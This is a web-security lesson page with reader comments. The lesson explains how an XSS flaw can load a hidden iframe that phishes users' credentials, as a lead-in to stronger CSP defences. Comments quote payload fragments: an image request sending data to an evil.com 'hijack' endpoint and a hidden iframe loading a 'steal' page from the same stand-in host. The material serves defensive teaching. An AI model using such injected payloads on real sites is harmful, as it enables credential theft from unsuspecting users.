Prompt Users for Credentials from a Vulnerable Website via iframe Injection

Share this video with your friends

Send Tweet

In this lesson, we'll learn how to exploit an XSS vulnerability to prompt victims for their usernames and passwords on a vulnerable site by loading up a IFRAME from the attacker's website. This will demonstrate that even though we've already mitigated JS based XSS attacks, there are other ways to exploit XSS, and we'll need a more robust CSP header to completely mitigate XSS, which we'll discover in our next lesson!

Gheorghe
Gheorghe
~ 4 years ago

typo: 'propmt' should be -> 'prompt'

Gheorghe
Gheorghe
~ 4 years ago

at payload level: img.src = https://evel.com:666/hijack?payload=${payload} should be img.src = https://evil.com:666/hijack?payload=${payload}

Gheorghe
Gheorghe
~ 4 years ago

i guess that 'payload', this time, should be only :

< iframe hidden src="https://evil.com:666/steal.html"></iframe>

Lucas Minter
Lucas Minter
~ 4 years ago

Thanks for this! I got the transcripts updated!